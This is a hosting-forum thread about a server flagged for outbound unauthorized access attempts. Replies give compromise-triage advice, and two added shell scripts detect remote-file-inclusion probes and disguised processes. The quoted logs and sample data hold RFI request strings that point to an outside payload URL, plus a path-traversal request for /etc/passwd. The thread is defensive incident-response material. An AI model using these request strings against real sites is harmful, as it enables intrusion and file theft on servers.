Full Version: unauthorized access attempts: help needed
The Planet Forums > Security > General Security
maximus17
Hi everybody,

Can anybody help me with this issue? I've got a ticket from the Abuse Team. What does this mean? I changed all passwords: FTP, root, admin and some strange server password. What next? Does anyone know at least what I should search for in Google to solve this problem?

Dear Customer, bla-bla-bla

For your convenience, please see attached report.

Request: websearch.ramaui.com 207.44.***.** - - [26/Aug/2008:01:30:27 -0500] "GET /smartframe/search.php?Task=http://wiminternational.org/n? HTTP/1.1" 500 550 "-" "libwww-perl/5.79" - "-"

Request: websearch.ramaui.com 207.44.***.** - - [26/Aug/2008:01:30:28 -0500] "GET /smartframe/search.php?Task=http://wiminternational.org/n? HTTP/1.1" 500 550 "-" "libwww-perl/5.79" - "-"

Request: websearch.ramaui.com 207.44.***.** - - [26/Aug/2008:01:30:29 -0500] "GET /smartframe/search.php?Task=http://wiminternational.org/n? HTTP/1.1" 500 550 "-" "libwww-perl/5.79" - "-"

Request: websearch.ramaui.com 207.44.***.** - - [26/Aug/2008:01:30:42 -0500] "GET /smartframe/search.php?Task=http://wiminternational.org/n? HTTP/1.1" 500 550 "-" "libwww-perl/5.79" - "-"
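The entries in the report are the complaining server's access log: the source address is the poster's machine, and a query parameter set to a full URL (`Task=http://...`) sent by `libwww-perl` is the classic pattern of a remote-file-inclusion probe fired by a scanning script. The following is an added example, not part of the original post, that pulls such probes out of an Apache combined log. The sample lines are constructed to match the ones above but use RFC 5737 documentation addresses; run the same functions over your own access log to see whether you were scanned the same way, and the extracted host names what to look for on the box (the payload the bot tries to include).

```shell
#!/bin/sh
# Added example: flag remote-file-inclusion (RFI) probes in an Apache access log.
# A "probe" here is a request whose query string carries a parameter whose value
# is a full URL (http://, https:// or ftp://), as in the ticket's entries.

# Constructed sample log lines modelled on the ticket; IPs are documentation
# addresses, not real hosts.  Line 3 is a benign request to the same script and
# line 4 is a path-traversal attempt, which this rule must NOT flag.
SAMPLE_LOG='203.0.113.9 - - [26/Aug/2008:01:30:27 -0500] "GET /smartframe/search.php?Task=http://wiminternational.org/n? HTTP/1.1" 500 550 "-" "libwww-perl/5.79"
203.0.113.9 - - [26/Aug/2008:01:30:28 -0500] "GET /smartframe/search.php?Task=http://wiminternational.org/n? HTTP/1.1" 500 550 "-" "libwww-perl/5.79"
198.51.100.4 - - [26/Aug/2008:02:10:03 -0500] "GET /smartframe/search.php?Task=news HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
198.51.100.7 - - [26/Aug/2008:02:11:45 -0500] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 310 "-" "Mozilla/5.0"'

# Filter: keep only request lines with a "?...=<scheme>://" parameter.
# Reads stdin, prints matching lines.  A hit that got a 200 with a sizeable
# body deserves far more attention than the 500s in the ticket.
flag_rfi() {
    grep -E '"(GET|POST) [^"]*[?][^"]*=(https?|ftp)://'
}

# Number of flagged lines in the sample (handy for thresholds and tests).
rfi_count() {
    printf '%s\n' "$SAMPLE_LOG" | flag_rfi | wc -l | tr -d ' '
}

# Distinct hosts being injected: the payload server to report, and what to
# search for in outbound traffic / dropped files on a server that was hit.
rfi_payload_hosts() {
    flag_rfi | sed -E 's#.*=(https?|ftp)://([^/ ?"]+).*#\2#' | sort -u
}

# Distinct source addresses of the probes, for blocking and for correlating
# with the abuse ticket.
rfi_sources() {
    flag_rfi | awk '{ print $1 }' | sort -u
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | flag_rfi
printf 'payload hosts:\n'; printf '%s\n' "$SAMPLE_LOG" | rfi_payload_hosts
printf 'sources:\n';       printf '%s\n' "$SAMPLE_LOG" | rfi_sources
```

To use it on a real log, replace the sample with `flag_rfi < /var/log/apache2/access.log`; the rule is deliberately narrow (parameter value must start with a URL scheme) so it does not fire on ordinary links inside referers or on traversal attempts, which need a separate rule.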
eth00
You only posted half of the ticket; what did they say to you? It sounds like your server might be launching attacks against other servers. They probably got in via a PHP injection and are running some processes on your server without ever having to log in with a password.
maximus17
Thank you for your reply!

I did not post the first part, because it seems to be automatically generated text without any useful information. Anyway, here is the missing part:

We have received reports of unauthorized access attempts originating from this server. This indicates possible server compromise, and it is your responsibility to investigate and resolve it. However, should you require help, please contact our professional service. Be advised that should we receive further reports, we may be forced to step in to prevent further abuse of our networks.

How can I find the vulnerable hole in my server? How can I find an already installed script (if one exists)? And finally, how can I prevent it in future?
dynamicnet
Greetings:

URL injection attacks typically mean that the server to which the attacker's IP address is bound is itself a compromised server.

Please check the server behind the IP address above for suspicious files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox, /var/spool/squid, and /var/spool/cron. Please use "ls -lab" for checking directories, as sometimes compromised servers will have hidden files that a regular "ls" will not show.

Please also check the process tree (ps -efl or ps -auwx) for suspicious processes; often the malware / hack pretends to be an Apache process.

Clam Anti-virus (clamscan) can also be used to find commonly used PHP- and Perl-based hacks, including various PHP shells, on a server, using the "--infected" and "--recursive" options.

You may also want to check out rootkit detection tools - http://www.chkrootkit.org/, http://www.rootkit.nl/, and http://www.ossec.net/en/rootcheck.html - which should be used in addition to checking the directories and process tree.

If you use cPanel, consider also using the nobody check from http://www.webhostgear.com/353.html

Thank you.
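The checks in the post above (hidden or executable files in the scratch directories, processes posing as Apache, then the signature scanners) can be scripted as a first-pass triage. The following is an added example, not dynamicnet's own tooling or any vendor's: it assumes a Linux host with /proc, the directory list from the post, and a set of "normal" Apache binary locations that you should adjust to your distribution. Run it as root on the suspect server; the `classify_proc` function is kept pure (claimed name plus real binary path in, verdict out) so the heuristic can be checked without a live process table.

```shell
#!/bin/sh
# Added example: first-pass compromise triage following the steps in the post.
# Assumptions: Linux (/proc), the scratch directories named in the post, and
# the Apache binary locations below (edit for your distribution).

SCRATCH_DIRS="/tmp /var/tmp /dev/shm /var/spool/samba /var/spool/vbox /var/spool/squid /var/spool/cron"

# Where apache/httpd legitimately executes from.  A process that calls itself
# httpd/apache but runs a binary from anywhere else is flagged.
APACHE_BIN_DIRS="/usr/sbin /usr/lib/apache2 /usr/lib64/apache2 /usr/local/apache /usr/local/apache2 /opt/apache"

# Step 1: dot-files and executables in the scratch directories, shown with
# "ls -lab" so names with spaces or control characters (e.g. "/tmp/. /")
# are printed escaped instead of hidden.
list_suspicious_files() {
    for d in $SCRATCH_DIRS; do
        [ -d "$d" ] || continue
        find "$d" -xdev \( -name '.*' ! -name '.' ! -name '..' -o -type f -perm -u+x \) \
            -exec ls -lab {} + 2>/dev/null
    done
    return 0
}

# Step 2a: verdict for one process from (a) the name it claims (attacker
# controlled: argv[0] / prctl) and (b) the binary really mapped as its
# executable (readlink /proc/PID/exe).  Prints ok | suspicious | unknown.
classify_proc() {
    claimed=$1
    exe=$2
    [ -n "$exe" ] || { echo unknown; return 0; }     # could not read exe link
    case "$exe" in
        */tmp/*|/dev/shm/*|*" (deleted)")            # scratch dir, or binary unlinked after start
            echo suspicious; return 0 ;;
    esac
    case "$claimed" in
        *httpd*|*apache*)
            dir=${exe%/*}
            for ok in $APACHE_BIN_DIRS; do
                case "$dir" in "$ok"|"$ok"/*) echo ok; return 0 ;; esac
            done
            echo suspicious ;;                       # "apache" running from the wrong place
        *)
            echo ok ;;
    esac
}

# Step 2b: walk the live process table and print everything not "ok".
check_processes() {
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        name=$(cat "$p/comm" 2>/dev/null) || continue
        exe=$(readlink "$p/exe" 2>/dev/null || true)
        verdict=$(classify_proc "$name" "$exe")
        [ "$verdict" = ok ] || printf '%s pid=%s comm=%s exe=%s\n' "$verdict" "$pid" "$name" "$exe"
    done
    return 0
}

# Step 3: the signature-based tools from the post, if installed.  clamscan
# exits 1 when it finds something, so the status is swallowed on purpose.
run_scanners() {
    if command -v clamscan >/dev/null 2>&1; then
        clamscan --infected --recursive $SCRATCH_DIRS /home /var/www 2>/dev/null || true
    fi
    if command -v chkrootkit >/dev/null 2>&1; then chkrootkit -q || true; fi
    if command -v rkhunter  >/dev/null 2>&1; then rkhunter --check --sk --rwo || true; fi
    return 0
}

echo "== hidden / executable files in scratch directories =="
list_suspicious_files
echo "== processes not matching their claimed identity =="
check_processes
if [ "${1:-}" = "--scan" ]; then run_scanners; fi
```

Invoke with `--scan` to add the (slow) clamscan and rootkit runs. Two things the script cannot tell you: a process whose exe link is unreadable comes back "unknown" rather than "ok", and a clean result from these heuristics is not proof of a clean host, so keep the web server's access log and the output of `ps -auwx` from this point for the investigation.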